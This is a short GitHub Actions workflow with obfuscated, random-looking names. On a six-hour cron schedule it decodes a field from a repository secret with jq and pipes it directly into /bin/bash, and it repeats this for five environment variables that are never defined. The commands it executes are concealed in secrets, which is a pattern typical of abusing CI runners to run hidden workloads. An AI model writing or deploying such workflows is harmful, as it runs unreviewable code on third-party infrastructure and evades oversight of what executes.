name: mingyulu1837

on:
  workflow_dispatch:
  schedule:
    - cron: '44 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          urwke8598: ${{ secrets.urwke8598 }}
        run: |
          echo $urwke8598 | jq -r .p81 | /bin/bash
          echo $y21217 | jq -r .oh8313 | /bin/bash
          echo $woc6560 | jq -r .psdsz70252 | /bin/bash
          echo $pce63 | jq -r .m8 | /bin/bash
          echo $frpsw1 | jq -r .huka6 | /bin/bash
          echo $dzkj833 | jq -r .wf169 | /bin/bash

